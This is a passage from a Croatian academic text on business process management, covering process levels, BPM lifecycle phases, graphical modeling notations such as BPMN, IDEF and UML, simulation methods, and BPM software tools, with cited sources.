− Poslovni proces je dio lanca vrijednosti koji ima svrhu, jasno definirane granice, ulaze i izlaze i resurse koji sudjeluju u izvedbi procesa. Mogu se podijeliti na podprocese,

− Aktivnost je najmanji dio procesa koji ima smisla modelirati i prikazati dija- gramom. Najčešće se prikazuje relativno složen radni zadatak ili više radnih zadataka. Zadatak predstavlja četvrtu razinu djelatnosti, često se koristi za opis funkcionalnosti nekog programskog rješenja,

− Korak je najjednostavnija operacija koju nije moguće detaljnije raščlaniti. Koraci se ne prikazuju modelima poslovnih procesa jer predstavljaju nisku, petu razinu djelatnosti, već se koriste kao sastavni dio modela za razvoj programskih rješenja i prikazuju poslovne tokove.

Kada se spoje sve razine djelatnosti poslovnih procesa možemo dobiti osnovni model poslovnih procesa. Osnovni model procesa se može prikazati putem shematskog prikaza pri čemu su jasno definirani ulazi (inputi) i izlazi (outputi).

72 Panian Ž. i suradnici, op cit., p. 125-126


118

Shema 2: Osnovni model procesa

Izvor: Brumec J., „Modeliranje poslovnih procesa“, Zagreb 2011, online: http://www.slideshare.net/Brumiko/modeliranje-poslovnih-procesa-uvod-u-bpmn (10.2.2014.)

Za određivanje poslovnih procesa, bitno je raspoznavati njihova obilježja kao što su svrha i vlasnik procesa, početak i završetak procesa, ulasci i izlasci (inputi i outputi) na temelju kojih se utvrđuje uspješnost procesa. Ponašanje procesa se može predvidjeti ukoliko se uzima u obzir da je proces sastavljen od sekvencijski izvedivih aktivnosti te da je una- prjeđenje poslovnih procesa neizbježno.73

Svaki menadžer je odgovoran za neki poslovni proces te treba razmotriti moguća unaprjeđenja koja su potrebna kako bi se organizacija mogla što bolje prilagoditi svojoj poslovnoj okolini.

Poslovni procesi se mogu unaprijediti pomoću:74 − Automatizacije i informatizacije poslovanja – uvođenje informacijske tehnologije

gdje se poslovni procesi prilagođavaju potrebama programskih rješenja, − Upravljanja poslovnih procesa – primjena metoda i alata za praćenje i kontrolu

poslovnih procesa − Ustupanja poslova (engl. Outsourcing) – racionalnije i učinkovitije prepuštanje

izvođenja poslovnih procesa drugim poduzećima, − Projektima promjene poslovanja – promjena postojećih poslovnih procesa i/ili

uvođenje novih poslovnih procesa.

2.1. UPRAVLJANJE POSLOVNIM PROCESIMA

Upravljanje poslovnim procesima je menadžerska disciplina koja se temelji na vlastitoj metodologiji i usmjerena je procesno-orijentiranoj kulturi u kojoj su sudionici u poslovnim aktivnostima međusobno ovisni jedni o drugima. Kako bi poduzeće postiglo i održalo konkurentsku prednost na tržištu, ono mora efikasno i efektivno upravljati vlastitim resursima i financijskim sredstvima.75 Upravljanje poslovnim procesima kombinira mena- džerski pristup sa odgovarajućom tehnologijom u cilju poboljšanja performansi poduzeća. Upravljanje poslovnim procesima (engl. Business Process Management) je sustavan pristup poboljšavanja poslovanja temeljen na oblikovanju, mjerenju, analizi, poboljšanju i upravljanju procesima. Upravljanje poslovnim procesima se oslanja na poslovni pristup upravljanja promjenama zbog unapređivanja poslovnih procesa s konačnim ciljem ostvarenja poslovnih 73 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 19-20 74 Bosilj Vukšić V., Hernaus T., Kovačić A., op cit., p.19-20 75 Tijan E., op.cit.


119

ciljeva, pri čemu promjene obuhvaćaju cijeli životni ciklus procesa: od definiranja i modeliranja do izvođenja, analize i optimizacije procesa.76 Procesna perspektiva omogućuje potrebnu integraciju, osiguravajući da se stvarna radna praksa eksplicitno poveže s cjeloku- pnim funkcioniranjem poduzeća.

Shema 3: Životni ciklus upravljanja procesima

Izvor: „Upravljanje poslovnim procesima u poduzećima Republike Hrvatske“, 2011, online: https://bib.irb.hr/datoteka/529970.UPRAVLJANJE_POSLOVNIM_PROCESIMA_U_PODUZEIMA_R EPUBLIKE_HRVATSKE.doc (6.3.2014.)

Kako bi se uopće moglo odvijati upravljanje poslovnim procesima, organizacija treba primijeniti procesni pristup te angažirati procesni menadžment koji će brinuti o samom upravljanju. Pri upravljanju poslovnim procesima treba uzeti u obzir koncept procesne organizacije. Procesno orijentirana organizacija smatra poslovne procese kao najvažnije u poslovanju, stoga zaposlenici iz svih funkcijskih jedinica čine procesne timove koji su odgovorni za izvršavanje procesa. Uvođenje procesne organizacije zahtjeva procesno razmišljanje koje se određuje kao razmišljanje između djelovanja funkcija procesa što znatno utječe na kvalitetu proizvoda i usluga, te razinu prilagodbe poslovanja ka novim zahtjevima tržišta. Upravljanjem poslovnim procesima postižu se:77

− Viša kvaliteta, − Kraće vrijeme, − Niži troškovi, − Poboljšavanje, − Smanjen rizik poslovanja.

Danas je sam koncept upravljanja poslovnim procesima sastavni dio svake organizacije koja želi postati i ostati konkurentna.

2.2. FAZE UPRAVLJANJA POSLOVNIM PROCESIMA

Faze upravljanja poslovnim procesima:78 76 „Upravljanje poslovnim procesima u poduzećima Republike Hrvatske“, op.cit. 77 „Upravljanje poslovnim procesima u poduzećima Republike Hrvatske“, op. cit. 78 Tijan E., op.cit.


120

− Identifikacija procesa, − Oblikovanje procesa – modeliranje tekućeg stanja poslovnih procesa, − Analiza procesa – ispituju se uska grla, redundantnost procesa itd., − Poboljšanje procesa – modeliranje željenog stanja procesa, − Implementacija procesa – dodaju se IT detalji implementacije, − Izvršavanje procesa – uvođenje i izvršavanje procesa, − Nadgledanje i kontrola procesa – radi redefiniranja procesa, − Promjene u procesima.

Faze upravljanja poslovnim procesima se odvijaju u više razina, ovisno o složenosti zadatka. Na najvišem nivou se predviđa unaprjeđenje sustava poslovanja, ukoliko to prilike dopuštaju, odnosno razmatraju se načini optimizacije. Način optimizacije sustava poslovanja unutar najvišeg nivoa sustava je modeliranje poslovnih procesa te simulacije sustava u određenim stanjima, kako bi se pronašao optimum. Idući nivo koji slijedi pri upravljanju poslovnim procesima pripada procesnom menadžmentu poduzeća koji nadgleda provođenje informacijskih sustava, prati stanja sustava i iskoristivosti vremena unutar sustava. Nadalje se javlja automatizacija pomoću koje se koordiniraju i prate aplikacije i njihovi dijelovi te se provode IT (engl. Information technologies) servisi. Najniži sloj pripada procesima, odnosno informatičkim servisima i infrastrukturi organizacije.

2.3. SUSTAV ZA UPRAVLJANJE POSLOVNIM PROCESIMA

Sustav za upravljanje poslovnim procesima (engl. Business Process Management System – BPMS) je platforma za povezivanje arhitekture poduzeća, modela poslovnih procesa, sustava za upravljanje poslovnim tokovima i informacijske infrastrukture kao potpore izvođenju poslovnih procesa.79 Upravljanje poslovnim procesima usmjereno je na razvoju platforme za integraciju arhitekture poduzeća, modela poslovnih procesa, sustava za upravljanje poslovnim tokovima i informacijske infrastrukture kao potpore izvođenju poslovnih procesa.80

Moderan BPM sustav obuhvaća: − Modeliranje, analizu i simulaciju procesa81, − Transformaciju modela u programski kod, − Integraciju s poslovnim aplikacijama i s drugim programskim rješenjima, − Izvođenje procesa, − Prilagodbu sustava u stvarnom vremenu, prilagodljivost, upravljanje iznimkama, − Kontrolu i praćenje poslovnih tokova te upravljanje poslovnim tokovima u

stvarnom vremenu, − Analizu uspješnosti poslovnih procesa nakon njegova izvođenja.

79 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p.139 80 Panian Ž. i suradnici, op.cit., p. 145 81 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p.140


121

Shema 4: Razvoj sustava za upravljanje poslovnim tokovima

Izvor: Bosilj Vukšić V., Hernaus T., Kovačić A.; Upravljanje poslovnim procesima – organizacijski i informacijski pristup, Školska knjiga, Zagreb 2008.; p. 136

Prikazana je povezanost perspektiva u sustavu upravljanja poslovnim tokovima. Unutar organizacijske strukture podijeljene su organizacijske jedinice i radna mjesta kojima su pridružene osobe (zaposlenici) i njihova uloga u provedbi poslovnih zadataka.

U fazi samih procesa su jasno definirani poslovni procesi, a sustav kontrolira odvijanje instanci procesa i upravlja tokom aktivnosti. Pritom slijed aktivnosti u procesu i izbor alternativnih aktivnosti ovisi o vrijednosti obilježja poslovnih sudionika u procesu te o metodama i pravilima njihova ponašanja.

Razvoj sustava za upravljanje poslovnim tokovima sastoji se od tri koraka koji obu- hvaćaju analizu poslovnog procesa, redizajn poslovnog procesa i razvoj aplikacija za upravljanje poslovnim tokovima i njihovo povezivanje s poslovnim aplikacijama i resursima što nalaže promatranje povezanosti raznih perspektiva unutar samog sustava.

3. MODELIRANJE POSLOVNIH PROCESA

Modeliranje poslovnih procesa je samo jedna od faza životnog ciklusa upravljanja poslovnim procesima. Ono je temelj upravljanja jer ako ne postoji jasno definiran model kako se odvija poslovanje, niti upravljanje nije moguće. Tijekom godina razvoja i primjene alata za modeliranje poslovnih procesa pokazalo se nužnim da informacijska tehnologija pomaže odnosno olakšava uspostavljanje agilnih i učinkovitih poslovnih procesa, odnosno podržava sve faze životnog ciklusa upravljanja poslovnim procesima – od strateškog promišljanja, preko dizajna poslovnih procesa i implementacije, pa sve do monitoringa i kontrolinga izvršenja procesa.82

Modeliranje poslovnih procesa je prikaz strukture i načina na koji se odvija neka djelatnost.83 Stoga je modeliranje poslovnih procesa sredstvo za bolje razumijevanje, preispi- 82 http://www.infotrend.hr/clanak/2008/3/alati-za-upravljanje-poslovnim-procesima,15,470.html (29.4.2014.) 83 Brumec J., op.cit.


122

tivanje i analizu poslovnih procesa. Pri modeliranju poslovnih procesa koriste se grafičke i simulacijske metode modeliranja. Modeliranje je najbolje rješenje prikazivanja elemenata modela poslovnog procesa sustava upravo zbog konstantnog unaprjeđivanja koje omogućuje kvalitetnije praćenje promjena u poslovnom svijetu.

Model je približni prikaz sustava ili procesa koji služi za razumijevanje sustava te za njegovo mijenjanje ili upravljanje. Modeli moraju biti što jednostavniji, a ipak ispravni za svrhu za koju su napravljeni. Modeli omogućuju opis kompleksnih fenomena, njihovo bolje razumijevanje, komunikaciju onih koji rješavaju problem i samo rješavanje problema.84

Oblici modela se mogu klasificirati prema:85

1. Razini djelatnosti

Prema razini djelatnosti oblici modela mogu biti opisni (grafički prikaz s atributima elemenata modela), analitički (resursi, detaljno odvijanje, različiti događaji) i izvršni – BPEL (engl. Business Process Executive Language)

2. Pretežitim korisnicima

Modeli prema pretežitim korisnicima se dijele na: modele namijenjene poslovnim stručnjacima te na modele namijenjene informatičkim stručnjacima.

3. Fazama razvoja poslovnog sustava

Faze razvoja poslovnog sustava se mogu promatrati kroz sadašnje stanje sustava kojemu pripadaju „AS IS“ modeli i kroz buduće stanje sustava koje nastaje nakon planiranog unapređenja kojemu pripadaju „TO BE“ modeli.

U praksi se poslovno modeliranje koristi u različite svrhe, a kao najvažnije koristi mogu se izdvojiti:86

− Usklađivanje poslovnih procesa s poslovnom strategijom i poslovnim ciljevima, − Zajedničko razumijevanje poslovnog sustava od strane različitih

zainteresiranih strana, − Razumijevanje postojećih problema i identificiranje prilika za poboljšanja, − Procjena utjecaja organizacijskih promjena, − Deriviranje zahtjeva za razvoj informacijskih sustava na temelju poslovnih

potreba i ciljeva.

3.1. METODE MODELIRANJA POSLOVNIH PROCESA

U metode modeliranja poslovnih procesa se ubrajaju grafičke i simulacijske metode modeliranja. Simulacijske metode opisuju dinamička stanja sustava, dok su grafičke metode

84 Topić G.,“Modeliranje poslovnih procesa i optimizacija ljudskih resursa u složenim poslovnim sustavima“, Ericsson Nikola Tesla d.d., Zagreb, online: https://www.fer.unizg.hr/_download/repository/Gordan_Topic_klasifikacijski.pdf (17.3.2014.) 85 Brumec J., op.cit. 86 http://www.croz.net/poslovno-modeliranje/ (8.2.2014.)


123

više orijentirane statičkom promatranju sustava. Simulacija omogućuje izvođenje procesa prije nego što je proces doista implementiran.

Time korisnik dobiva mogućnost provjere je li proces pravilno koncipiran, odnosno hoće li doista odvijati kako je zamišljeno i hoće li biti postignuti željeni rezultati. Također omogućuje statističko vrednovanje performansi procesa u raznim scenarijima i promjenu dizajna kako bi optimizirali procese u njihovom specifičnom dizajnu. Nadalje, moguće je i modeliranje resursa dostupnih organizaciji. Na taj se način mogu utvrditi uska grla u procesima ili resursima u organizaciji.87

Obje metode imaju pripadajuće prednosti i nedostatke, ovisno o potrebama korisnika. Razvojem tehnologije, brojni alati za modeliranje sadrže obje metode kako bi omogućili korisniku što opsežniju i kvalitetniju uslugu.

3.1.1. Grafičke metode

Prikladan način opisivanja poslovnog procesa je njegov grafički prikaz, osobito ako je dopunjen formalnim opisom pojedinih značajki. Da bi se izbjegla mogućnost različite interpretacije i omogućilo računalno upravljanje izvođenjem poslovnih procesa, utvrđene su norme kojima se propisuje način prikazivanja i opisivanja procesa i njihovih odnosa. Najnovija i danas gotovo općenito korištena norma naziva se BPMN (engl. Business Process Modeling and Notation), a za postupak njezine primjene u poslovnoj i informatičkoj domeni usvojen je naziv modeliranje poslovnih procesa.88

Tablica 1: Grafičke metode modeliranja

Izvor: Bosilj Vukšić V., Hernaus T., Kovačić A.; Upravljanje poslovnim procesima – organizacijski i informacijski pristup, Školska knjiga, Zagreb 2008.; p. 152-153

U grafičke metode modeliranja poslovnih procesa pripadaju: DFD dijagram, IDEF metode, EPC dijagram, BPMN metoda, SADT dijagram, UML dijagram, EC dijagram.

Dijagram toka podataka (engl. Data Flow Diagram - DFD) je grafička metoda prikazivanja tokova podataka u sustavu, njihovih izvorišta i odredišta te poslovne procese koji djeluju na tokove podataka.89 Zapisivanje se vrši međunarodno dogovorenim simbolima i ne ovisi o govornom jeziku onoga koji sastavlja algoritam.90 87 http://www.infotrend.hr/clanak/2008/3/alati-za-upravljanje-poslovnim-procesima,15,470.html (29.4.2014.) 88 Brumec J., op.cit. 25Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 153 90 http://public.carnet.hr/~zorkovac/informatika/algoritmi/Dijagram_toka.html (16.4.2014.)


124

Prikaz 1: Izgled dijagrama toka podataka DFD prikazuje poslovne aktivnosti i

njihove međusobne promjene u sustavu. Kao i većina grafičkih metoda, ne prikazuje dinamiku procesa i uglavnom se koristi se pri razvoju informacijskih sustava.

IDEF (engl. Integrated Definition) je zajednički naziv koji se odnosi na klase modeliranja poslovnih jezika. Cilj IDEF metoda je modeliranje aktivnosti koje su potrebne za analizu sustava, dizajn sustava te poboljšanje

funkcioniranja sustava. U početku IDEF je razvijen kako bi se razvila komunikacija među ljudima koji pokušavaju razumjeti sustav, no danas se koristi za dokumentaciju, razumijevanje, dizajn, planiranje i integraciju sustava.91

IDEF metodologija obuhvaća skup integriranih modela, koji su definirani sa zasebnim standardima. IDEF metode su nastajale kroz niz godina, a dijelom su utemeljene na strukturnim metodama razvoja softvera, odnosno informacijskih sustava. Do danas je razvijeno do 16 vrsta IDEF dijagrama, od kojih svaki ima različitu funkciju.

Tablica 2: IDEF metode

Izvor: http://searchsoa.techtarget.com/definition/IDEF (5.7.2014.)

SADT dijagram (engl. Structured Analysis and Design Tehniques – SADT diagram) je grafička metoda za planiranje, analizu i dizajn informacijskih sustava. Jedna od glavnih prednosti ovog dijagrama je razdvajanje složenih modela na jednostavnije modele pomoću hijerarhijskih struktura. Razlikuju se dva tipa modela SADT dijagrama: model aktivnosti i model podataka.92 Na postojeću SADT strukturu nadograđen je IDEF0 dijagram.

91 Ozgun Demirag, „Integrated Definition (IDEF) Modeling Techniques“, online: http://www2.isye.gatech.edu/~lfm/8851/IDEF_V4.ppt (4.7.2014.) 92 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 156

Izvor: http://www.edrawsoft.com/Data- Flow- Diagrams.php (10.7.2014.)


125

Prikaz 2: Izgled IDEF0 dijagrama

Izvor:

https://conceptdraw.com/a687c3/preview--IDEF0%20diagram%20template (10.7.2014.) U praksi su najčešće korištene metode IDEF0 Function Modeling (Modeliranje

funkcija, procesa i aktivnosti), IDEF1X Data Modeling (Modeliranje podataka) i IDEF3 Process Description Capture (Opis procesa, dijagram toka posla).93

EPC dijagram (engl. Event Driven Process Chain – EPC diagram) omogućuje procesni pristup prikazivanjem događaja i aktivnosti u obliku lančanih reakcija povezivanjem istih strelicama i logičkim operatorima. EPC dijagram prikazuje logički slijed događaja i operacija u ispitivanom sustavu.

Nadogradnjom EPC dijagrama, nastao je eEPC dijagram (engl. extended Event Process Chain) sa većom primjenom upravo zbog proširene notacije u kojoj su uvedeni simboli koji omogućuju povezivanje organizacijskog, podatkovnog i funkcijskog pristupa.94

Prikaz 3: Izgled EPC dijagrama

Izvor: http://www.conceptdraw.com/examples/epc-diagram (11.7.2014.) 93 Bogati J., Vuk D., „IDEF metodologija modeliranja informacijskih sustava“, Stručni rad, Praktični menadžment, Vol. III, br. 4, p. 93-99; 25.12.2012. , online: http://hrcak.srce.hr/file/142655 (4.7.2014.) 94 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 161


126

Ovi dijagrami su povoljni za planiranje resursa organizacije te za identifikaciju mogućih unaprjeđenja u postojećim poslovnim procesima.

3.1.2. BPMN metoda

BPMN metoda (engl. Business Proces Modeling Notation) je grafička metoda modeliranja koja sadrži BPD dijagram (engl. Business Process Diagram) čiji se procesi prikazuju simbolima događaja i aktivnosti sa pripadajućim logičkim operatorima. BPD je procesni dijagram sa hijerarhijskom metodologijom sa mogućnošću prebacivanja u izvršni jezik BPEL (engl. Business Process Execution Language) čime se omogućuje prikazivanje dinamičkih procesa.

Kao što je vidljivo na prikazu 5, BPD dijagram započinje i završava događajima, koji su međusobno povezani aktivnostima i zadacima. Prikazana su polja u kojima se odvijaju podprocesi koji se nadovezuju na glavni proces.

3.1.3. UML dijagram

UML (engl. Unified Modeling Language) je grafički jezik za vizualizaciju, specifikaciju, razvoj i dokumentiranje programskih rješenja či- me je određen način prikaza. UML je zajednički jezik za poslovne analitičare i programere koji ga koriste za opisivanje, konkretiziranje, dizajniranje poslovnih procesa te njihovo ponašanje i dokumentaciju.95

Prikaz 5: Izgled UML dijagrama

Izvor: http://www.conceptdraw.com/samples/uml-diagrams (12.7.2014.)

95 http://www.uml-diagrams.org/ (12.7.2014.)

Izvor: ttp://www.conceptdraw.com/ mosaic/bpmn-swim-pool (11.7.2014.)

Prikaz 4: Izgled BPD dijagrama


127

UML dijagrami se dijele u tri različite skupine u koje je svrstano 13 dijagrama mo- deliranja96:

− Strukturni dijagrami (dijagram klasa, dijagram objekata, dijagram komponenta, dijagram složene strukture, paketni dijagram, dijagram rasporeda)

− Dijagrami ponašanja (dijagram korištenja, dijagram aktivnosti, dijagram stanja) − Diijagrami međudjelovanja (dijagram komunikacije, dijagram slijeda, vremenski

dijagram, dijagram pregleda međudjelovanja)

3.1.4. Simulacijske metode

Simulacijsko modeliranje se koristi radi procjene situacije u uvjetima nakon promjene određenih parametara koji su najčešće vezani za proces poslovanja. Simulacijski modeli prikazuju da li će se određeno ulaganje isplatiti, odnosno opravdati investiciju u određeni sektor. U svrhu simulacija se koriste specijalizirani sustavi namijenjeni razvoju samih simulacija.

Shema 5: Simulacijski proces

Izvor: https://bib.irb.hr/datoteka/347082.modeliranje_i_simulacija_-_v2a2.pdf (1.6.2014.)

Umjesto statičkog modeliranja fokus se prebacuje na progresivno modeliranje koje, zahvaljujući simulacijama ili oponašanju postižu mogućnost generiranja podataka. Kako simulacijsko modeliranje dozvoljava provjeru poslovnog prototipa i prije nego je on u stvarnosti realiziran, dugoročnost realnog vremena precizno komprimira u tek nekoliko minuta.97

Zahvaljujući dinamičnosti simulacijskog modeliranja optimiziraju se i verificiraju poslovni procesi jer se kroz simulacijsku podršku omogućava provjerljivost i eksperimentalnu slobodu bez realnih posljedica uz istovjetnu otvorenost prema stalnim provjerama i perfo- rmativnim izvedbama uz imanentnu komponentu vremenske i financijske uštede. Iz navedenog se očituje potencijal simulacijskog modeliranja za promjenu poslovnih procesa.98

U vrste simulacija se ubrajaju diskretne simulacije (simulacije diskretnih događaja) i sistemska dinamika. Diskretne simulacije služe za simulaciju diskretnih događaja, odnosno

96 Bosilj Vukšić V., Hernaus T., Kovačić A.,op.cit., p. 159 97 „Simulacijsko modeliranje poslovnih procesa“, online: http://autopoiesis.foi.hr/wiki.php?name=KM%20- %20Tim%2033&parent=NULL&page=Simulacijsko%20modeliranje%20poslovnih%20procesa (20.5.2014.) 98 Ibidem


128

njihovu procjenu, dok se sistemska dinamika odnosi na sustave s povratnim vezama, poput ekosustava, ekonomskih sustava i slično.99

Razlozi za primjenu simulacijskog modeliranja pri promjeni poslovnih procesa:100 − Simulira se dinamika procesa, − Simulacija uključuje utjecaj slučajnih varijabilna provođenje procesa, − Simulacija omogućuje predviđanje učinka promjena, − Eksperimentiranje s modelom omogućuje analizu i usporedbu različitih scenarija, − Rezultati predviđanja iskazuju se kvantitativnim parametrima, − Moderan simulacijski softver omogućuje vizualizaciju i animaciju procesa, čime

se postiže bolje razumijevanje i postojećih i novih procesa u poduzeću. Pored brojnih prednosti simulacijskog modeliranja nalaze se i nedostaci:101

− Dug i skup razvoj modela, − Složeno vrednovanje modela i izvođenje eksperimenta, − Potrebno je poznavati veći broj metoda i alata, − Ne dobivaju se optimalna rješenja.

3.1.4.1. Diskretne simulacije

Diskretne simulacije ili simulacije diskretnih događaja prikazuju i opisuju stanje ili promjene stanja sustava koja se odvijaju u promatranom vremenu te se ne pojavljuju periodi- čno, već diskontinuirano. Pomoću diskretne simulacije može se prikazati stanje realnog sustava, njegove objekte i njihovo međusobno djelovanje koje uzrokuje promjene u djelovanju navedenog sustava.

Diskretne simulacije koriste se za:102 − Detaljan opis strukture sustava i njegovih elemenata , − Ponašanje sustava opisuju se na diskontinuirani način, u obliku slijeda različitih

događaja i aktivnosti, − Modeli oponašaju stvarne sustave i procese, a objekti u modelima predstavljaju

objekte iz stvarnih sustava ili procesa, − Za modeliranje i analizu sustava s redovima čekanja na resurse sustava.

3.1.4.2. Sistemska dinamika

Sistemska dinamika je metoda za kontinuiranu simulaciju sustava s povratnom vezom, odnosno sustava u kojima pojedini elementi mogu utjecati na sebe same preko lanca uzroka i posljedica.103

99 Klepac G., „Sustavi potpore odlučivanju“, Priručnik, Algebra d.o.o., Zagreb 2011, p. 14 100 Bosilj Vukšić V., Hernaus T., Kovačić A.,op.cit., p. 167. 101 Ibidem 102 Čerić V., „Diskretna simulacija“, Ekonomski fakultet, Zagreb, online: http://web.efzg.hr/dok/INF/Ceric/spo/(3a)_diskretna_simulacija.pdf8.4.2014.) 103 Ibidem


129

Sistemska dinamika koristi se u različitim oblicima poslovnih odluka kao što su:104 − Problemi zapošljavanja, − Rast poduzeća, − Proizvodnja i zalihe, − Interaktivne poslovne igre.

3.1.4.3. Faze simulacijskog modeliranja

Simulacijsko modeliranje prolazi kroz niz faza koje osiguravaju kvalitetno modeliranje i dobivanje optimalnih rezultata simuliranja određenog stanja sustava.

Shema 6: Faze simulacijskog modeliranja

Izvor: Bosilj Vukšić V., Hernaus T., Kovačić A.; Upravljanje poslovnim procesima – organizacijski i informacijski pristup, Školska knjiga, Zagreb 2008.; p. 169-170

Faze simulacijskog modeliranja započinju prikupljanjem podataka pri čemu se određuju ulazni parametri kao što su veličina uzorka, vrijeme provođenja mjerenja, mjesto gdje će se obavljati mjerenje i sl. Nadalje slijedi faza analiziranja ulaznih parametara te se postavljaju odgovarajuće hipoteze vezane za statističke alate koji će se koristiti u daljnjoj analizi. Nakon provedene statističke analize slijedi odabir metode kako bi se razvio konceptualni model sustava.

Te metode su uglavnom grafičke metode koje imaju mogućnost prevođenja modela iz konceptualnog u izvršni oblik. Faza izgradnje modela i faza pretvorbe modela iz konceptualnog u izvršni se spajaju kako bi postupak bio što učinkovitiji. U fazi verificiranja se testiraju procedure i logika modela koji je prešao iz konceptualnog oblika u izvršni, a u fazi vrednovanja se ispituje da li simulacijski model prikazuje stvarni sustav.

Nakon završetka prethodnih faza kojima se dokazuje ispravnost i funkcionalnost modela, slijedi faza eksperimentiranja u kojoj se uvode različiti scenariji u parametre modela kako bi se različito dobiveni podaci mogli uspoređivati. Uspoređivanjem takvih podataka dobiva se optimalno rješenje za pojedini sustav ili dio sustava. U konačnici slijedi faza prikupljanja i statističke analize izlaznih rezultata kojima se izračunavaju standardne devijacije i razdiobe vjerojatnosti kako bi se što kvalitetnije moglo djelovati i predvidjeti stvarni sustav. 104 Ibidem


130

3.2.. NAČELA I PRISTUPI MODELIRANJU POSLOVNIH PROCESA

Kako bi kvalitetnije razumjeli problematiku modeliranja poslovnih procesa te samo ponašanje istih, potrebno je definirati kutove gledišta na određeni problem, kao i vrstu i ponašanje pojedinih modela.

Načela pri modeliranju poslovnih procesa:105 • 1. Načelo apstrakcije – radi boljeg razumijevanja problema, potrebno ga je prika-

zati u pojednostavljenom obliku. Problem treba izdvojiti iz stvarne okoline te za- nemariti popratne detalje čime se umanjuje njegova složenost,

• 2. Načelo formalnosti – omogućuje metodičan pristup problemu prema odgovara- jućim procedurama. Uvode se algoritmi, pravila i zakonitosti,

• 3. Načelo modularnosti – problem se dijeli na manje složene dijelove, module kako bi se bolje razumio,

• 4. Načelo hijerarhije – problem se također dijeli na module koji se svrstavaju prema njihovoj kompleksnosti, od najsloženijih prema najjednostavnijima.

Pristup modeliranju započinje se definicijom cilja modeliranja, a tu se uglavnom radi o upoznavanju rada i optimizaciji procesa. Nakon toga nužno je osvrnuti se na izvore podataka koji su korišteni pri modeliranju procesnog sustava. Uglavnom je riječ o vremenskim projektnim planovima, promatranju značajki procesa, dokumentaciji opisa procesa i uloga te iskustvenoj metodi, odnosno uključenosti u sam proces. Napredno modeliranje poslovnih procesa trebalo bi uključivati i psiho-fizičku dimenziju ljudskog resursa koji učestvuje u procesu, što znači da bi se u modele trebale ugraditi komponente koje opisuju određene prosječne značajke ljudskog bića u poslovnom okruženju.

Tablica 3: Pristupi u modeliranju poslovnih procesa106

Izvor: Bosilj Vukšić V., Hernaus T., Kovačić A.; Upravljanje poslovnim procesima – organizacijski i informacijski pristup, Školska knjiga, Zagreb 2008.; p. 152

U tablici 3 su prikazane četiri vrste pristupa: podatkovni, funkcijski, organizacijski i procesni pristup. Prema traženom pristupu navedeno je težište te metoda modeliranja za pojedini pristup. 105 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 151 106 Topić G., op.cit.


131

3.3. ALATI ZA MODELIRANJE POSLOVNIH PROCESA

Alati za modeliranje poslovnih procesa baziraju se na programskim paketima koji pružaju mogućnost bržeg i jednostavnijeg modeliranja stanja sustava ili pojedinih procesa.

Programski alati orijentirani poslovnim procesima se dijele u dvije skupine:107 • 1. Alati za modeliranje i analizu poslovnih procesa, • 2. Alati za upravljanje poslovnim procesima.

Prikaz 6: Programski paketi orijentirani poslovnim procesima

Izvor: Bosilj Vukšić V., Hernaus T., Kovačić A.; Upravljanje poslovnim procesima – organizacijski i informacijski pristup, Školska knjiga, Zagreb 2008.; p. 192

U prikazu 6 navedena je skupina programskih alata koji su usmjereni ka poslovnim procesima, njihovoj analizi, upravljanju i kontroli tih procesa.

Obje kategorije, alati za upravljanje poslovnim procesima i alati za modeliranje i analizu poslovnih procesa su međusobno povezane stoga ih je potrebno kombinirati kako bi rezultati istraživanja bili što precizniji.

3.3.1. Programski alati za modeliranje i analizu poslovnih procesa

Alati za modeliranje i analizu poslovnih procesa primjenjuju se za oblikovanje modela poslovnih procesa, za pohranu podataka o tim modelima te za njihovu analizu. Ovi alati omogućuju dokumentaciju i analizu postojeće situacije, ali i buduće u obliku prijedloga poboljšanja i analize očekivanih učinaka.108

Alati koji se koriste su grafičke i simulacijske metode prognoziranja i analize posto- jećeg stanja kojima se stvaraju procesne mape pomoću kojih se definiraju interesni elementi. Pri odabiru alata za modeliranje i analizu poslovnih procesa bitno je utvrditi kompatibilnost određenog alata sa ciljevima organizacije kako bi se izbjegle neželjene smetnje u poslovanju. 107 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 192 108 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 193


132

U vodeće alate i proizvođače specijalizirane za modeliranje i analizu poslovnih procesa pripadaju iGrafx, Casewise, IBM, EMC, IDS Scheer, Proforma te Mega Inte- rnational.109

3.3.2. Programski alati za upravljanje poslovnim procesima

Programski alati za upravljanje poslovnim procesima zahtijevaju razne mogućnosti i visoke informatičke standarde kako su najčešće kombinirani sa alatima za modeliranje i analizu poslovnih procesa.

Danas, alati za upravljanje poslovnim procesima obuhvaćaju različita rješenja koja omogućuju potpunu prilagodbu alata potrebama korisnika, što je financijski izazovno te zahtjeva dugotrajan proces izvedbe.110

Od kvalitetnog alata za upravljanje poslovnim procesima se očekuje da sadrži pla- tformu za utvrđivanje strateških ciljeva i ključnih pokazatelja izvršenja (engl. Key Perfo- rmance Indicator – KPI) kako bi se nadziralo provođenje strategije. Također veoma je bitno da omogućuje dizajniranje i analizu poslovnih procesa u svrhu optimizacije poslovnih procesa i sadrži mehanizam za simuliranje poslovnih procesa. Kvalitetan alat bi trebao uklanjati razlike između modela procesa i stvarnog izvršenja procesa, omogućujući implementaciju že- ljenih poslovnih procesa u praksi te da omogućuje praćenje izvršavanja procesa. 111

Razvojem tehnologije i konstantom željom za unaprjeđivanjem, javlja se sve veća potreba za dinamičkim modeliranjem, odnosno za simulacijama modela. Pomoć alata s vizua- lizacijom i ostalim dodacima – kao što je simulacija i utvrđivanje troškova temeljnih na akti-vnostima (engl. Activity Based Costing – ABC)112 je temelj za optimiziranje poslovnih procesa i shvaćanje troškova i vremenskih ušteda.

Vodeći proizvođači alata za upravljanje poslovnim procesima su: Pegasystems, Lo-mbardi Software, Savvion, Metastorm, Appian, Tibco Software i IBM.113

4. POBOLJŠANJE I REINŽENJERING POSLOVNIH PROCESA

Poboljšanje i reinženjering poslovnih procesa su procesi koji su vremenski determini- rani, odnosno u životnom vijeku poslovnih procesa javiti će se potreba za poboljšanjem ili reinženjeringom postojećih poslovnih procesa. Stoga je nužno razumijevanje navedenih termina kako bi organizacije bile spremne na neizbježne promjene u ponašanju poslovnih procesa.

